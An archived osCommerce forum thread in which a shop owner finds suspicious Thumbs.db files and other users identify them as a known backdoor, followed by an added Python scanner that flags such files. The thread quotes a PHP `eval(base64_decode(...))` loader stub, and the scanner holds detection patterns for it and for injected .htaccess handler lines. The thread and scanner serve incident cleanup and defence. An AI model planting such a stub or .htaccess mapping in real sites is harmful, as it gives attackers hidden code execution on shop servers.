osCommerce

The e-commerce.

Thumbs.db


Plux

Ruud,

No, there are not.

Chris

Where do these come from then (btw. it was oscMAX2.0).

they contain code like I read that they were special oscommerce database files or something like that.

ÐÏࡱ

and

<?php 
@eval(base64_decode("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")); ?>

Are there any files that come with osCommerce called Thumbs.db in a clean installation?

 

They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

So none of them should be in an osCMAX2.0 website I presume?

 

I tried deleting one but then I got a fatal error visiting the admin panel. However beside saying error nothing worked out of the ordinary.

 

And why is the file so heavily encrypted?

I'd bet a pickled buffalo tongue that if you look closer the last file you posted is really named Thumbs.db.php, a known hack file.

 

And hey, what a coincidence, what you posted sure looks like hack code to me...

:blush:

http://www.oscommerce.com/forums/topic/374682-weird-files/

 

You need to either manually remove the malicious code on your site or go to a backup prior to April 23rd (most likely the time of attack).

 

Files that were likely infected

Numerous .php files

Numerous .htm or html files

 

Had you done this when you first posted the topic, your host would probably have had a backup, if you didn't, that they could help you with.

 

You then need to update your FTP program and change all passwords used with it.

Additionally read the how to secure your site thread here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

I'm not sure how this works in oscMax but it's a good starting point nonetheless

 

I have this same attack on one of my sites.

They also update the .htaccess file to recognize the thumbs.db, so deleting the thumbs.db is not enough; you have to scroll down to the very bottom of the .htaccess file and delete the added line.

 

tom

Archived

This topic is now archived and is closed to further replies.
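
A defender-side check for what this thread describes, as an added example that is not part of the original posts or of osCommerce: it tells a genuine Windows thumbnail cache (OLE2 header) from a PHP file named Thumbs.db*, and flags .htaccess lines that run .db files as PHP. The thread does not show the added .htaccess line, so the AddType/AddHandler pattern is an assumption, and the function names are hypothetical.

```python
import os
import re

# OLE2 compound-file signature that a genuine Windows Thumbs.db starts with.
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
# PHP open tag, or eval() fed by base64_decode(), as in the snippet posted in the thread.
PHP_RE = re.compile(rb"<\?php|eval\s*\(\s*base64_decode\s*\(", re.I)
# Assumption: the added .htaccess line uses AddType/AddHandler to run .db files as PHP.
HTACCESS_RE = re.compile(r"^\s*Add(Type|Handler)\b.*php.*\.db\b", re.I)


def classify_thumbs(data: bytes) -> str:
    """Return 'php' if PHP code is present, 'ole' for a real thumbnail cache, else 'unknown'."""
    if PHP_RE.search(data):
        return "php"  # checked first: PHP placed after a valid OLE header is still PHP
    if data.startswith(OLE_MAGIC):
        return "ole"
    return "unknown"


def suspicious_htaccess_lines(text: str) -> list:
    """Return (line_number, line) pairs that map the .db extension to a PHP handler."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if HTACCESS_RE.match(line)]


def scan(root: str) -> list:
    """Walk root and return sorted (relative_path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            lower = name.lower()
            if lower.startswith("thumbs.db"):
                with open(path, "rb") as fh:
                    kind = classify_thumbs(fh.read(1 << 20))  # first 1 MiB only
                if kind != "ole" or lower != "thumbs.db":
                    findings.append((rel, f"thumbs file classified as {kind}"))
            elif lower == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for n, line in suspicious_htaccess_lines(fh.read()):
                        findings.append((rel, f"line {n}: {line}"))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for rel, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

Run it against the web root; a real Thumbs.db is harmless clutter but does not belong on a web server either, so anything the scan reports as `php` or `unknown` deserves a manual look.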
